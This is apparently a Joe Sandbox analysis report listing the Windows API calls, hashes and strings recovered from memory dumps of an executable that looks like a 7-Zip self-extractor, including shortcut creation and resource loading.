• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
• Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
• Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
• Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD
APIs
• ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
• Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
• Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
• Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54
APIs
• SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: FileTime
• String ID:
• API String ID: 1425588814-0
• Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
• Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
• Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
• Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02
APIs
• ??2@YAPAXI@Z.MSVCRT(00000060,?,?,00000000,?,0040D96E,00000000,?,00000000,00000000,000000FF,?,00000001,?,?,?), ref: 0040D91A
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
• Opcode ID: 8955cc1b29c93d01701bbb2481471dd0eaf8a49c35f18cc8a7d41221c9f85a6f
• Instruction ID: 1ceb60bf2594cd826c4dcd58ac8a3e75a9726935558582f6c117c88f0dd7e0c4
• Opcode Fuzzy Hash: 8955cc1b29c93d01701bbb2481471dd0eaf8a49c35f18cc8a7d41221c9f85a6f
• Instruction Fuzzy Hash: 4A219372A042858FCF30FF91D98096B77A5AF50358320853FE093732C1DA38AD49D75A
APIs
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
• Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
• Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
• Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59
APIs
• ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
• Opcode ID: a7abc97568459436273e1f083447e626332fd1c69ee6784c82a7404474e7416c
• Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
• Opcode Fuzzy Hash: a7abc97568459436273e1f083447e626332fd1c69ee6784c82a7404474e7416c
• Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                • Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                                                                                                                                                                                                • Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                • Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                                                                                                                                                                                                • Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                                                                                                                                • Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                                                                                                                                                                                                • Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                                • Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                                                                                                                                                                                                • Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _wtol.MSVCRT ref: 004034E5
                                                                                                                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
                                                                                                                                                                                                                                                • _wtol.MSVCRT ref: 0040367F
                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                                                                                                                                                                                                • String ID: .lnk
                                                                                                                                                                                                                                                • API String ID: 408529070-24824748
                                                                                                                                                                                                                                                • Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                                                                                                                                                                                                                • Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00401FFD
                                                                                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00402017
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040204C
                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00402098
                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                                                                                                                                                                                                • _wtol.MSVCRT ref: 0040212A
                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                • String ID: 7zSfxString%d$XpA$\3A
                                                                                                                                                                                                                                                • API String ID: 2117570002-3108448011
                                                                                                                                                                                                                                                • Opcode ID: 548ade176c921e3c89d1731ce67e310a71d7e7a73203bdbbb6ff14cd1b9bb65a
                                                                                                                                                                                                                                                • Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 548ade176c921e3c89d1731ce67e310a71d7e7a73203bdbbb6ff14cd1b9bb65a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                                                                                                                                                                                                • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                                                                                                                                                                                                • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 00401C41
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00401C76
                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00401C95
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00401CAD
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                                                                                                                                                                                                • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                                                                                                                                                                                                • API String ID: 2639302590-365843014
                                                                                                                                                                                                                                                • Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                                                                                                                                                                                                • Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
• String ID:
• API String ID: 829399097-0
• Opcode ID: a8862aa27d5a6cc2b1ba12d709e13e5df444902fd3bed4afc67f02113c073308
• Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
• Opcode Fuzzy Hash: a8862aa27d5a6cc2b1ba12d709e13e5df444902fd3bed4afc67f02113c073308
• Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4

APIs
• FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
• lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
• lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
• SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
